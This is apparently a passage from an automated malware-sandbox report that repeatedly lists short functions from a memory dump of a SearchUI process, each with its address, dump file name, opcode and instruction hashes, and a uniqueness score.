                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E10, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426015D8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600DF0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602DB8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600DC0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426015C0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426015C8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600DC8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602DD0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426015D0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600DD0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600DA0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600DA8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602DB0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426015B0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600DB0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E88, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E90, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E58, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E58, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E60, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E68, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E70, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E70, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E38, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E48, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E20, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E28, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E28, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
